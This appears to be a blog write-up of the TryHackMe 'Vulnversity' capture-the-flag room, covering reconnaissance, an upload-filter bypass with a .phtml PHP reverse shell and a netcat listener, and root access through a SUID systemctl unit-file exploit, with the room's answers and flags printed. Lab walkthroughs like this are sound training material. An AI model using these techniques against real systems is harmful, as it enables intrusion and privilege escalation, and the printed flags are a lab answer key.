Let’s walk through the Vulnversity room of tryhackme.com. This write-up is written for educational purposes. Please do not use it for cheating or skipping the tasks.
Task 1 Deploy the machine
Deploy the machine, and go to task 2.
Task 2 Reconnaissance
Run the provided nmap command. Read the text about the command and its usage.
Scan the box, how many ports are open? 6
What version of the squid proxy is running on the machine? 3.5.12
How many ports will nmap scan if the flag -p-400 was used? 400
Using the nmap flag -n what will it not resolve? dns
What is the most likely operating system this machine is running? ubuntu
What port is the web server running on? 3333
Task 3 Locating directories using GoBuster
Run the GoBuster, and check its output!
What is the directory that has an upload form page? /internal/
Task 4 Compromise the webserver
What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out. .php
Run this attack, what extension is allowed? .phtml
(We have to open Burp Suite and test it out with an extension list we create by hand.)
After this task we will use a php web shell to create a reverse shell to our machine.
Let’s start the listener on our machine.
nc -lvnp 1234Then on the AttackBox let’s download the php reverse shell code and set the IP address option in it to our AttackBox’s IP address.
Rename the file to a .phtml extension and upload it to the server.
Open the file in the browser at http://{VM_IP_ADDRESS}:3333/internal/uploads/php-reverse-shell.phtml and our reverse shell is alive.
Let’s look around!
$ ls /home
bill
$ ls /home/bill
user.txt
$ cat /home/bill/user.txt
8bd7992fbe8a6ad22a63361004cfcedb
At this point we have all the information to answer the remaining questions!
What is the name of the user who manages the webserver? bill
What is the user flag? 8bd7992fbe8a6ad22a63361004cfcedb
Task 5 Privilege Escalation
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/nullOn the system, search for all SUID files. What file stands out? /bin/systemctl
Become root and get the last flag (/root/root.txt) a58ff8579f0a9270368d33a9966c7fd5
Checking the systemctl binary on GTFOBins will give some results.
Reading the text we will have a basic understanding of the exploit.
The first line can be skipped, the exploit looks like this:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TFWe can change it for our favor: we want to see the contents of the /root/root.txt file as per the task. Let’s modify the SystemD Unit to access this file and direct its contents to the /tmp/output file!
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TFThe entire exploitation will look like the following:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
cat /tmp/output
a58ff8579f0a9270368d33a9966c7fd5
After answering the question we are done with this room.
Tom's IT Cafe 